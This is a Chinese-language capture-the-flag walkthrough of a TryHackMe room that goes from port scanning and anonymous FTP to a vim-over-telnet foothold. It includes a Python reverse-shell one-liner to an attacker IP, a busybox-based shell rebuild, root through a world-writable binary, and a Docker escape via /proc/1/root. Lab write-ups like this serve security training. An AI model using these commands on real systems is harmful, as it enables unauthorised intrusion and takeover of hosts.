Frosteau Busy with Vim
御剑扫到22,80,8065,8095,8085,8075端口
nmap进一步扫描
┌──(root㉿7)-[~/thm/Frosteau_Busy_with_Vim]
└─# nmap -A -p 22,80,8065,8095,8085,8075 10.10.41.204
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 18:58 CST
Nmap scan report for 10.10.41.204
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7b:53:bf:4a:24:0c:3f:22:a8:a0:88:4b:77:8c:0b:cf (RSA)
| 256 ac:fa:c4:a3:87:a6:44:75:e5:7e:25:70:eb:e5:aa:db (ECDSA)
|_ 256 a2:5b:67:d5:3b:9a:6b:47:4f:74:a9:ab:07:48:6b:6a (ED25519)
80/tcp open http Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
8065/tcp open telnet
| fingerprint-strings:
| GenericLines, GetRequest, NCP, NULL, RPCCheck, SIPOptions, tn3270:
| Ubuntu 22.04.3 LTS
| Help:
| Ubuntu 22.04.3 LTS
|_ HELP
8075/tcp open ftp BusyBox ftpd (D-Link DCS-932L IP-Cam camera)
|_ftp-bounce: bounce working!
| ftp-syst:
| STAT:
| Server status:
| TYPE: BINARY
|_Ok
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.18.0.2 is not the same as 10.10.41.204
8085/tcp open telnet
| fingerprint-strings:
| NULL:
| Ubuntu 22.04.3 LTS
|_ [...]
8095/tcp open telnet
| fingerprint-strings:
| GenericLines:
| Ubuntu 22.04.3 LTS
|_ [...]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (98%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (94%), Linux 5.13 (92%), Linux 2.6.32 - 3.5 (92%), Linux 2.6.32 - 3.13 (92%), Linux 5.0 - 5.14 (92%), Android 9 - 10 (Linux 4.9 - 4.14) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: OS: Linux; Device: webcam; CPE: cpe:/o:linux:linux_kernel, cpe:/h:dlink:dcs-932l
8075开启ftp,尝试匿名登录anonymous
┌──(root㉿7)-[~/thm/Frosteau_Busy_with_Vim]
└─# ftp 10.10.158.69 8075
Connected to 10.10.158.69.
220 Operation successful
Name (10.10.158.69:root): anonymous
230 Operation successful
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 EPSV ok (|||36395|)
ftp: Can't connect to `10.10.158.69:36395': Connection refused
200 Operation successful
150 Directory listing
total 8132
-rw-r--r-- 1 0 0 3010 Nov 5 2023 FROST-2247-SP.txt
-rw-r--r-- 1 0 0 3211 Nov 5 2023 YETI-1125-SP.txt
-rw-r--r-- 1 0 0 24 Nov 5 2023 flag-1-of-4.txt
-rw-r--r-- 1 0 0 12 Nov 5 2023 flag-2-of-4.sh
-rw-r--r-- 1 0 0 2127524 Nov 5 2023 frostling_base.png
-rw-r--r-- 1 0 0 2305908 Nov 5 2023 frostling_five.png
-rw-r--r-- 1 0 0 1589463 Nov 5 2023 yeti_footage.png
-rw-r--r-- 1 0 0 2277409 Nov 5 2023 yeti_mugshot.png
226 Operation successful
ftp> get flag-1-of-4.txt
local: flag-1-of-4.txt remote: flag-1-of-4.txt
200 Operation successful
150 Opening BINARY connection for flag-1-of-4.txt (24 bytes)
100% |**************************************************************************************************************************************| 24 0.22 KiB/s 00:00 ETA
226 Operation successful
24 bytes received in 00:00 (0.22 KiB/s)
THM{Let.the.game.begin}
另一个flag-2-of-4.sh,flag2在环境变量中
echo $FLAG2
telnet连入8085端口,发现是个vim
telnet 10.10.41.204 8085
没法!sh执行命令
不过可以e来读文件和目录
echo可以来打印变量
THM{Seems.like.we.are.getting.busy}
:version发现可以用python3
尝试发现没法弹shell
:python3 import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.21.126.163",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
bin目录全是空的
:echo $SHELL可以发现调用的是/tmp/sh,而实际上它是个空文件
也难怪之前报错
再尝试修改shell路径也无果,没有找到可用的shell
:set shell=
现在需要我们自己重新构造这个shell
ftp传一个busybox
ftp> put busybox
local: busybox remote: busybox
229 EPSV ok (|||46089|)
ftp: Can't connect to `10.10.158.69:46089': Connection refused
200 Operation successful
150 Ok to send data
100% |**************************************************************************************************************************************| 1104 KiB 78.69 KiB/s 00:00 ETA
226 Operation successful
vim
#编辑busybox
:e /tmp/ftp/busybox
#保存为/tmp/sh
:w! /tmp/sh
#赋权
:python3 import os;os.chmod("/tmp/sh", 0o777)
重启终端后发现:sh可以直接进入shell交互界面了
问题是什么命令都执行不了
这就回到busybox的用法了,回到第一次用busybox的时候MoeCTF2024-wp|n0o0b’s blog
简单说就是如果busybox文件名是什么就只执行什么命令,现在busybox是/tmp/sh那它就只能执行sh的功能
如果busybox文件名就是busybox,那就取argv0,即第一个参数
我们在命名一个叫busybox的busybox即可,由于/tmp/ftp属于ftp用户没有权限,只能再复制到/tmp目录下
#编辑busybox
:e /tmp/ftp/busybox
#保存为/tmp/sh
:w! /tmp/busybox
#赋权
:python3 import os;os.chmod("/tmp/busybox", 0o777)
这样就可以执行任意命令了,也不需要复制那么多个ls、id、pwd啥的,此时/tmp/sh和/tmp/busybox是完全一样的,但/tmp/sh是为执行/tmp/busybox提供一个交互环境
重新构建一下shell环境
当前session有效
:sh
/ $ /tmp/busybox mkdir /tmp/bin
/ $ /tmp/busybox --install /tmp/bin
/ $ export PATH="$PATH:/tmp/bin"
/ $ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
现在想办法拿到root权限
上传linpeas辅助提权,发现/etc/passwd是可写的,但似乎没有什么用,没有su这样的suid文件
查看进程发现8065端口telnet运行/usr/frosty/sh
查看一下发现是777权限,且为空,难怪之前telnet连接8065会自动退出
/ $ ls -la /usr/frosty/sh
-rwxrwxrwx 1 root root 0 Mar 27 07:20 /usr/frosty/sh
利用busybox修复他
cp /tmp/busybox /usr/frosty/sh
telnet连接8065发现依旧没有shell环境,这是因为没有添加PATH环境变量
添加/tmp/bin到PATH或者继续利用busybox重建/bin的二进制文件
/ # /tmp/busybox --install /bin
/ # id
uid=0(root) gid=0(root) groups=0(root)
拿到flag3
/ # cd /root
~ # ls
flag-3-of-4.txt
~ # cat *
THM{Not.all.roots.and.routes.are.equal}
在根目录下存在.dockerenv文件,很显然在docker中
我们需要docker逃逸
ps查看进程发现/usr/bin的进程,以及一堆本不应该出现在docker中的进程
之前我们得知/usr/bin内为空
显然这些都是宿主机的进程,它们在docker内共享!
如果这样我们可以轻松通过/proc/<pid>/root访问到宿主机的文件系统
(unknown) # ls /proc/1/root/root
flag-4-of-4.txt snap yetikey3.txt
sh: getcwd: No such file or directory
(unknown) # cat /proc/1/root/root/*
THM{Frosteau.would.be.both.proud.and.disappointed}
cat: read error: Is a directory
3-d2dc6a02db03401177f0511a6c99007e945d9cb9b96b8c6294f8c5a2c8e01f60
sh: getcwd: No such file or directory
